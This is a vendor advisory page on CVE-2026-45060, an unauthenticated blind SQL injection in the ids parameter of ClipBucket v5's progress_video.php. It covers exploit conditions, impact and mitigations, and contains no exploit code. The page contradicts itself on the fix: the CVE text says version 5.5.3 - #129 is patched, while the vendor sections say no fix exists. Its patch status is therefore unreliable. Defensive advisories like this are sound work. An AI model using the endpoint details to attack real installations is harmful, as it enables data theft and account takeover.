How is CVE-2026-45060 exploited?

Network reachability (required): The vulnerable endpoint is exposed over the network, so the attacker must be able to reach the service via HTTP from any internet or internal network origin. Authentication (not-required): No credentials of any privilege level are required; the injection is reachable by fully anonymous requests. Victim interaction (not-required): The attacker sends requests directly to the server and no user action or social engineering is needed to trigger the vulnerability. Attack complexity (info): Exploitation is reliable and condition-free; no race conditions, memory-layout dependencies, or special environmental factors need to align.

What is the impact of CVE-2026-45060?

Reads all database content, including user credentials, session tokens, private video metadata, and any stored personal or payment data. Modifies or deletes persisted database rows, enabling account takeover, content manipulation, or destruction of platform data. Crashes or degrades the database-dependent service, taking the video platform offline. Enables potential pivoting to other internal services if database credentials or connection strings are recoverable from the schema.

Back to search

CRITICALCVE-2026-45060Published 2026-06-11Modified 2026-06-12CNA GitHub_M

CVE-2026-45060: ClipBucket: Blind SQL Injection in progress_video.php

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #129, the actions/progress_video.php endpoint is vulnerable to blind SQL injection. Any unauthenticated user can exploit the ids parameter to execute SQL queries and exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #129.

CVSS v3.1: 9.8
Severity: CRITICAL
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

Blind SQL injection in ClipBucket v5 allows any unauthenticated remote attacker to inject arbitrary SQL through the ids parameter of the actions/progress_video.php endpoint. The service is reachable over the network and requires no credentials or user interaction to exploit. Successful exploitation gives the attacker full read and write access to the underlying database as well as the ability to disrupt availability. HarborGuard tracks this advisory and will make a patched-image rebuild available the moment an upstream fix is published.

HarborGuard Coverage

Detection

Detection for CVE-2026-45060 is available across every HarborGuard environment, with the CVE matched against images in customer registries and CI/CD pipelines within minutes of publication. Coverage extends to custom-built images that bundle ClipBucket v5, not only official upstream images.

Available

Triage

HarborGuard scores this CVE at 9.8 CRITICAL using the CVSS v3.1 vector and surfaces it through each customer org's compliance-policy weighting to ensure it routes to the right team inbox without manual sorting. Per-environment policy configuration controls escalation thresholds and assignment rules.

Available

Patch

Because no fix version has been published upstream, HarborGuard re-checks the advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment an upstream fix is released. For customers with auto-remediation enabled, the rebuild, regression run, and PR against affected workloads will be triggered without manual intervention once a fix exists.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The vulnerable endpoint is exposed over the network, so the attacker must be able to reach the service via HTTP from any internet or internal network origin.
AuthenticationNot required
No credentials of any privilege level are required; the injection is reachable by fully anonymous requests.
Victim interactionNot required
The attacker sends requests directly to the server and no user action or social engineering is needed to trigger the vulnerability.
Attack complexityDetail
Exploitation is reliable and condition-free; no race conditions, memory-layout dependencies, or special environmental factors need to align.

Blast Radius

Reads all database content, including user credentials, session tokens, private video metadata, and any stored personal or payment data.
Modifies or deletes persisted database rows, enabling account takeover, content manipulation, or destruction of platform data.
Crashes or degrades the database-dependent service, taking the video platform offline.
Enables potential pivoting to other internal services if database credentials or connection strings are recoverable from the schema.

How HarborGuard Handles This

Available on HarborGuard: because no upstream patch exists for CVE-2026-45060 as of publication, HarborGuard continuously re-checks the advisory on every ingest cycle and will make a patched-image rebuild available the moment MacWarrior publishes a fix for ClipBucket v5. For customers with auto-remediation enabled, that rebuild will immediately trigger a regression test run and open a PR against any affected workloads, with no manual steps required. In the interim, compensating controls are strongly recommended: apply network-policy rules to restrict inbound access to the progress_video.php endpoint to trusted sources only, place a web application firewall rule to block SQL metacharacter patterns in the ids parameter, and consider disabling the endpoint entirely via feature-flag or server configuration if the functionality is non-essential. The 9.8 CRITICAL score means this should be treated as an active-risk item even before a patch lands.

See how HarborGuard automates this

Affected packages

MacWarrior / clipbucket-v5
< 5.5.3 - #129

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-wpq3-gxx7-c76h

Metrics

Get notified